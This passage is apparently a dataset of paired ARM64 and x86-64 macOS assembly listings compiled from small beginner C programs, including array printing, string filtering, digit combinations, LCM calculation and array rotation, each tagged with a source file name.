; Child Loop BB0_3 Depth 2
ldur w8, [x29, #-8]
subs w8, w8, #3
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
stur wzr, [x29, #-12]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
ldr x8, [sp, #8]
ldursw x9, [x29, #-8]
ldr x8, [x8, x9, lsl #3]
ldursw x9, [x29, #-12]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_3
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB0_1
LBB0_8:
stur wzr, [x29, #-8]
b LBB0_9
LBB0_9: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-8]
subs w8, w8, #3
cset w8, ge
tbnz w8, #0, LBB0_12
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_9 Depth=1
ldr x8, [sp, #8]
ldursw x9, [x29, #-8]
ldr x0, [x8, x9, lsl #3]
bl _free
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_9 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB0_9
LBB0_12:
ldr x0, [sp, #8]
bl _free
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl $24, %edi
callq _malloc
movq %rax, -24(%rbp)
movl $4, %edi
callq _malloc
movq %rax, %rcx
movq -24(%rbp), %rax
movq %rcx, (%rax)
movl $8, %edi
callq _malloc
movq %rax, %rcx
movq -24(%rbp), %rax
movq %rcx, 8(%rax)
movl $12, %edi
callq _malloc
movq %rax, %rcx
movq -24(%rbp), %rax
movq %rcx, 16(%rax)
movq -24(%rbp), %rax
movq (%rax), %rax
movl $1, (%rax)
movq -24(%rbp), %rax
movq 8(%rax), %rax
movl $1, (%rax)
movq -24(%rbp), %rax
movq 8(%rax), %rax
movl $1, 4(%rax)
movq -24(%rbp), %rax
movq 16(%rax), %rax
movl $1, (%rax)
movq -24(%rbp), %rax
movq 16(%rax), %rax
movl $2, 4(%rax)
movq -24(%rbp), %rax
movq 16(%rax), %rax
movl $1, 8(%rax)
movl $0, -8(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
cmpl $3, -8(%rbp)
jge LBB0_8
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl $0, -12(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
jg LBB0_6
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movq -24(%rbp), %rax
movslq -8(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -12(%rbp), %rcx
movl (%rax,%rcx,4), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_3
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
## %bb.7: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB0_1
LBB0_8:
movl $0, -8(%rbp)
LBB0_9: ## =>This Inner Loop Header: Depth=1
cmpl $3, -8(%rbp)
jge LBB0_12
## %bb.10: ## in Loop: Header=BB0_9 Depth=1
movq -24(%rbp), %rax
movslq -8(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
callq _free
## %bb.11: ## in Loop: Header=BB0_9 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB0_9
LBB0_12:
movq -24(%rbp), %rdi
callq _free
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "\n"
.subsections_via_symbols
| the_stack_data/75138002.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #192
.cfi_def_cfa_offset 192
stp x29, x30, [sp, #176] ; 16-byte Folded Spill
add x29, sp, #176
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #12]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
add x0, sp, #18
mov w1, #150
bl _fgets
str wzr, [sp, #8]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
; Child Loop BB0_10 Depth 3
ldrsw x9, [sp, #8]
add x8, sp, #18
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_16
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_10 Depth 3
ldrsw x9, [sp, #8]
add x8, sp, #18
ldrsb w8, [x8, x9]
subs w8, w8, #97
cset w8, lt
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
ldrsw x9, [sp, #8]
add x8, sp, #18
ldrsb w8, [x8, x9]
subs w8, w8, #122
cset w8, le
mov w9, #1
str w9, [sp] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_8
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldrsw x9, [sp, #8]
add x8, sp, #18
ldrsb w8, [x8, x9]
subs w8, w8, #65
cset w8, lt
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_3 Depth=2
ldrsw x9, [sp, #8]
add x8, sp, #18
ldrsb w8, [x8, x9]
subs w8, w8, #90
cset w8, le
mov w9, #1
str w9, [sp] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_3 Depth=2
ldrsw x9, [sp, #8]
add x8, sp, #18
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
str w8, [sp] ; 4-byte Folded Spill
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp] ; 4-byte Folded Reload
tbnz w8, #0, LBB0_14
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #8]
str w8, [sp, #4]
b LBB0_10
LBB0_10: ; Parent Loop BB0_1 Depth=1
; Parent Loop BB0_3 Depth=2
; => This Inner Loop Header: Depth=3
ldrsw x9, [sp, #4]
add x8, sp, #18
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_13
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_10 Depth=3
ldr w8, [sp, #4]
add w8, w8, #1
add x9, sp, #18
add x8, x9, w8, sxtw
ldrb w8, [x8]
ldrsw x10, [sp, #4]
add x9, x9, x10
strb w8, [x9]
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_10 Depth=3
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB0_10
LBB0_13: ; in Loop: Header=BB0_3 Depth=2
ldrsw x9, [sp, #4]
add x8, sp, #18
add x8, x8, x9
strb wzr, [x8]
b LBB0_3
LBB0_14: ; in Loop: Header=BB0_1 Depth=1
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB0_1
LBB0_16:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
add x0, sp, #18
bl _puts
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_18
b LBB0_17
LBB0_17:
bl ___stack_chk_fail
LBB0_18:
mov w0, #0
ldp x29, x30, [sp, #176] ; 16-byte Folded Reload
add sp, sp, #192
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter a string: "
l_.str.1: ; @.str.1
.asciz "Output: "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $176, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -164(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq -160(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $150, %esi
callq _fgets
movl $0, -168(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
## Child Loop BB0_10 Depth 3
movslq -168(%rbp), %rax
movsbl -160(%rbp,%rax), %eax
cmpl $0, %eax
je LBB0_16
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_3
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_10 Depth 3
movslq -168(%rbp), %rax
movsbl -160(%rbp,%rax), %eax
cmpl $97, %eax
jl LBB0_5
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movslq -168(%rbp), %rax
movsbl -160(%rbp,%rax), %ecx
movb $1, %al
cmpl $122, %ecx
movb %al, -173(%rbp) ## 1-byte Spill
jle LBB0_8
LBB0_5: ## in Loop: Header=BB0_3 Depth=2
movslq -168(%rbp), %rax
movsbl -160(%rbp,%rax), %eax
cmpl $65, %eax
jl LBB0_7
## %bb.6: ## in Loop: Header=BB0_3 Depth=2
movslq -168(%rbp), %rax
movsbl -160(%rbp,%rax), %ecx
movb $1, %al
cmpl $90, %ecx
movb %al, -173(%rbp) ## 1-byte Spill
jle LBB0_8
LBB0_7: ## in Loop: Header=BB0_3 Depth=2
movslq -168(%rbp), %rax
movsbl -160(%rbp,%rax), %eax
cmpl $0, %eax
sete %al
movb %al, -173(%rbp) ## 1-byte Spill
LBB0_8: ## in Loop: Header=BB0_3 Depth=2
movb -173(%rbp), %al ## 1-byte Reload
xorb $-1, %al
testb $1, %al
jne LBB0_9
jmp LBB0_14
LBB0_9: ## in Loop: Header=BB0_3 Depth=2
movl -168(%rbp), %eax
movl %eax, -172(%rbp)
LBB0_10: ## Parent Loop BB0_1 Depth=1
## Parent Loop BB0_3 Depth=2
## => This Inner Loop Header: Depth=3
movslq -172(%rbp), %rax
movsbl -160(%rbp,%rax), %eax
cmpl $0, %eax
je LBB0_13
## %bb.11: ## in Loop: Header=BB0_10 Depth=3
movl -172(%rbp), %eax
addl $1, %eax
cltq
movb -160(%rbp,%rax), %cl
movslq -172(%rbp), %rax
movb %cl, -160(%rbp,%rax)
## %bb.12: ## in Loop: Header=BB0_10 Depth=3
movl -172(%rbp), %eax
addl $1, %eax
movl %eax, -172(%rbp)
jmp LBB0_10
LBB0_13: ## in Loop: Header=BB0_3 Depth=2
movslq -172(%rbp), %rax
movb $0, -160(%rbp,%rax)
jmp LBB0_3
LBB0_14: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_15
LBB0_15: ## in Loop: Header=BB0_1 Depth=1
movl -168(%rbp), %eax
addl $1, %eax
movl %eax, -168(%rbp)
jmp LBB0_1
LBB0_16:
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
leaq -160(%rbp), %rdi
callq _puts
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_18
## %bb.17:
xorl %eax, %eax
addq $176, %rsp
popq %rbp
retq
LBB0_18:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter a string: "
L_.str.1: ## @.str.1
.asciz "Output: "
.subsections_via_symbols
| the_stack_data/778674.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/134153.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_print_comb ; -- Begin function ft_print_comb
.p2align 2
_ft_print_comb: ; @ft_print_comb
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #10
stur w8, [x29, #-4]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-4]
add w8, w8, #1
stur w8, [x29, #-4]
subs w8, w8, #800
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
mov w10, #100
sdiv w8, w8, w10
add w8, w8, #48
sturb w8, [x29, #-5]
ldur w8, [x29, #-4]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
mov w10, #10
sdiv w8, w8, w10
add w8, w8, #48
sturb w8, [x29, #-6]
ldur w8, [x29, #-4]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
add w8, w8, #48
sturb w8, [x29, #-7]
ldursb w8, [x29, #-5]
ldursb w9, [x29, #-6]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_7
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldursb w8, [x29, #-6]
ldursb w9, [x29, #-7]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_7
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #12
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
mov w0, #44
bl _ft_putchar
mov w0, #32
bl _ft_putchar
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldursb w0, [x29, #-5]
bl _ft_putchar
ldursb w0, [x29, #-6]
bl _ft_putchar
ldursb w0, [x29, #-7]
bl _ft_putchar
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
b LBB0_1
LBB0_8:
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ft_print_comb ## -- Begin function ft_print_comb
.p2align 4, 0x90
_ft_print_comb: ## @ft_print_comb
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $10, -4(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -4(%rbp), %eax
addl $1, %eax
movl %eax, -4(%rbp)
cmpl $800, %eax ## imm = 0x320
jge LBB0_8
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -4(%rbp), %eax
movl $100, %ecx
cltd
idivl %ecx
addl $48, %eax
## kill: def $al killed $al killed $eax
movb %al, -5(%rbp)
movl -4(%rbp), %eax
movl $100, %ecx
cltd
idivl %ecx
movl %edx, %eax
movl $10, %ecx
cltd
idivl %ecx
addl $48, %eax
## kill: def $al killed $al killed $eax
movb %al, -6(%rbp)
movl -4(%rbp), %eax
movl $10, %ecx
cltd
idivl %ecx
addl $48, %edx
movb %dl, %al
movb %al, -7(%rbp)
movsbl -5(%rbp), %eax
movsbl -6(%rbp), %ecx
cmpl %ecx, %eax
jge LBB0_7
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movsbl -6(%rbp), %eax
movsbl -7(%rbp), %ecx
cmpl %ecx, %eax
jge LBB0_7
## %bb.4: ## in Loop: Header=BB0_1 Depth=1
cmpl $12, -4(%rbp)
je LBB0_6
## %bb.5: ## in Loop: Header=BB0_1 Depth=1
movl $44, %edi
callq _ft_putchar
movl $32, %edi
callq _ft_putchar
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
movsbl -5(%rbp), %edi
callq _ft_putchar
movsbl -6(%rbp), %edi
callq _ft_putchar
movsbl -7(%rbp), %edi
callq _ft_putchar
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_1
LBB0_8:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/150867.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #16
str x8, [x9]
sub x8, x29, #20
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldur w8, [x29, #-16]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur w8, [x29, #-16]
str w8, [sp, #24] ; 4-byte Folded Spill
b LBB0_3
LBB0_2:
ldur w8, [x29, #-20]
str w8, [sp, #24] ; 4-byte Folded Spill
b LBB0_3
LBB0_3:
ldr w8, [sp, #24] ; 4-byte Folded Reload
stur w8, [x29, #-8]
b LBB0_4
LBB0_4: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-8]
ldur w10, [x29, #-16]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_7
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_4 Depth=1
ldur w8, [x29, #-8]
ldur w10, [x29, #-20]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
b LBB0_8
LBB0_7: ; in Loop: Header=BB0_4 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB0_4
LBB0_8:
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter two numbers: "
l_.str.1: ; @.str.1
.asciz "%d %d"
l_.str.2: ; @.str.2
.asciz "LCM: %d"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -16(%rbp), %rsi
leaq -20(%rbp), %rdx
movb $0, %al
callq _scanf
movl -16(%rbp), %eax
cmpl -20(%rbp), %eax
jle LBB0_2
## %bb.1:
movl -16(%rbp), %eax
movl %eax, -24(%rbp) ## 4-byte Spill
jmp LBB0_3
LBB0_2:
movl -20(%rbp), %eax
movl %eax, -24(%rbp) ## 4-byte Spill
LBB0_3:
movl -24(%rbp), %eax ## 4-byte Reload
movl %eax, -8(%rbp)
LBB0_4: ## =>This Inner Loop Header: Depth=1
movl -8(%rbp), %eax
cltd
idivl -16(%rbp)
cmpl $0, %edx
jne LBB0_7
## %bb.5: ## in Loop: Header=BB0_4 Depth=1
movl -8(%rbp), %eax
cltd
idivl -20(%rbp)
cmpl $0, %edx
jne LBB0_7
## %bb.6:
jmp LBB0_8
LBB0_7: ## in Loop: Header=BB0_4 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB0_4
LBB0_8:
movl -8(%rbp), %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter two numbers: "
L_.str.1: ## @.str.1
.asciz "%d %d"
L_.str.2: ## @.str.2
.asciz "LCM: %d"
.subsections_via_symbols
| the_stack_data/98576028.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _Reversal ; -- Begin function Reversal
.p2align 2
_Reversal: ; @Reversal
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str w1, [sp, #20]
ldr x8, [sp, #24]
ldr w9, [sp, #20]
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
str w8, [sp, #16]
ldr w8, [sp, #20]
subs w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #24]
ldr w9, [sp, #12]
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
ldr x9, [sp, #24]
ldrsw x10, [sp, #12]
str w8, [x9, x10, lsl #2]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
subs w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_4:
ldr w8, [sp, #16]
ldr x9, [sp, #24]
str w8, [x9]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _RightReversal ; -- Begin function RightReversal
.p2align 2
_RightReversal: ; @RightReversal
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
str w2, [sp, #16]
str wzr, [sp, #12]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_4
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldur x0, [x29, #-8]
ldr w1, [sp, #16]
bl _Reversal
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB1_1
LBB1_4:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _Display ; -- Begin function Display
.p2align 2
_Display: ; @Display
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
str wzr, [sp, #16]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #16]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_4
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #16]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB2_3
LBB2_3: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB2_1
LBB2_4:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #12]
adrp x8, l___const.main.arr@PAGE
add x8, x8, l___const.main.arr@PAGEOFF
ldr q0, [x8]
add x0, sp, #16
str x0, [sp] ; 8-byte Folded Spill
str q0, [sp, #16]
ldur q0, [x8, #12]
stur q0, [x0, #12]
mov w1, #3
mov w2, #7
str w2, [sp, #8] ; 4-byte Folded Spill
bl _RightReversal
ldr x0, [sp] ; 8-byte Folded Reload
ldr w1, [sp, #8] ; 4-byte Folded Reload
bl _Display
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB3_2
b LBB3_1
LBB3_1:
bl ___stack_chk_fail
LBB3_2:
mov w0, #0
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d "
.section __TEXT,__const
.p2align 2 ; @__const.main.arr
l___const.main.arr:
.long 1 ; 0x1
.long 2 ; 0x2
.long 3 ; 0x3
.long 4 ; 0x4
.long 5 ; 0x5
.long 6 ; 0x6
.long 7 ; 0x7
.section __TEXT,__cstring,cstring_literals
l_.str.1: ; @.str.1
.asciz "\n "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _Reversal ## -- Begin function Reversal
.p2align 4, 0x90
_Reversal: ## @Reversal
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movq -8(%rbp), %rax
movl -12(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -16(%rbp)
movl -12(%rbp), %eax
subl $1, %eax
movl %eax, -20(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $0, -20(%rbp)
jl LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movl -20(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %edx
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
